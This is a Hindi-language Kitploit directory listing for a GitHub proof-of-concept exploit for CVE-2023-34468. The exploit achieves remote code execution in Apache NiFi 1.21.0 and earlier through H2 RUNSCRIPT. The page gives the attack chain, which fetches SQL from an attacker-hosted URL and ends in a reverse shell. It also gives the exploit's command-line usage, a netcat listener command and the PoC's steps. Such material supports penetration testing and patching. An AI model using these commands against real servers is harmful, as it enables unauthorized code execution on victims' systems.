Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/0xsoulaimane/cve-2023-34468-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHub0xsoulaimane/cve-2023-34468-poc

CVE-2023-34468-POC

CVE-2023-34468 के लिए PoC एक्सप्लॉइट — Apache NiFi <= 1.21.0 में H2 RUNSCRIPT के माध्यम से RCE

रिपॉजिटरी देखें
44 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Apache NiFi <= 1.21.0 में H2 Database RUNSCRIPT के माध्यम से Remote Code Execution


भेद्यता

Apache NiFi डिफ़ॉल्ट रूप से एक H2 database JAR के साथ आता है। DBCPConnectionPool controller service को इस H2 driver का उपयोग करने के लिए कॉन्फ़िगर किया जा सकता है। H2 एक RUNSCRIPT statement का समर्थन करता है जो किसी remote URL से SQL फ़ाइल प्राप्त करके निष्पादित करता है। वह SQL फ़ाइल CREATE ALIAS के माध्यम से मनमाना Java कोड परिभाषित कर सकती है और उसे सर्वर OS पर निष्पादित कर सकती है।

Attack chain:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

प्रभावित संस्करण

SoftwareVersion
Apache NiFi<= 1.21.0
Fixed in1.21.1+
JavaAny (bundled)

आवश्यकताएँ

  • Python 3.x
  • requests library → pip install requests
  • anonymous write access वाला NiFi target या वैध क्रेडेंशियल
  • target से आपकी मशीन तक नेटवर्क एक्सेस (reverse shell callback के लिए)

उपयोग

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

आर्ग्युमेंट्स

ArgumentDefaultDescription
--targethttp://NiFi.target.comTarget NiFi base URL
--lhost10.10.10.10Your IP (tun0)
--lport4444Reverse shell listener port
--http-port80Port to serve rce.sql
--cleanupFalseDelete created artifacts after run

सेटअप

Terminal 1 — listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 — exploit:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

PoC क्या करता है

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
टूल डाउनलोड करें